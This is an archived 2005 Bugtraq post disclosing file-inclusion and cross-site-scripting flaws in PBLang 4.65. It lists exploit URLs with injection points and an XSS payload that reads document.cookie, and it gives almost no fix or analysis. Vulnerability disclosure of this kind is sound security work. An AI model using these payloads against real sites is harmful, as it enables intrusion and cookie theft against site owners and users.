File Including In PBLang

abducter_minds_at_yahoo.com
Date: 10/27/05

Next message: Paul Craig: "Multiple vulnerabilities within RockLiffe MailSite Express WebMail"

Previous message: dave canuck: "Re: [ GLSA 200510-23 ] TikiWiki: XSS vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: 27 Oct 2005 11:57:24 -0000
To: bugtraq@securityfocus.com

('binary' encoding is not supported, stored as-is)

Class: Input Validation Error
CVE: CVE-MAP-NOMATCH
Remote: Yes
Local: Yes
Credit: Abducter (ABDUCTER_MINDS@YAHOO.COM) Or (ABDUCTER_MINDS76@HOTMAIL.COM)
Vulnerable: File Including In PBLang 4.65 (ALL VERSION)
* info *
PBLang IS POWER PHP SITES SUPPORT HERE
http://pblang.drmartinus.de/

* expliot *
http://www.victim.com/profile.php?u=[abducter here]
http://www.victim.com/pmpshow.php?num=[abducter here]
http://www.victim.com/delpm.php?id=[abducter here]

u can do xss in any expliot as this
http://www.victim.com/pmpshow.php?num=>JavaScript:alert(document.cookie);</script>

* credit *
         Devil-00
         Security4Arab .. A'Where Home .. WE LOVE S4A FOR EVER :P
         HACKERS PAL ..
         WwW.S4a.Cc
         MY LOVE (N0N0)

Next message: Paul Craig: "Multiple vulnerabilities within RockLiffe MailSite Express WebMail"

Previous message: dave canuck: "Re: [ GLSA 200510-23 ] TikiWiki: XSS vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]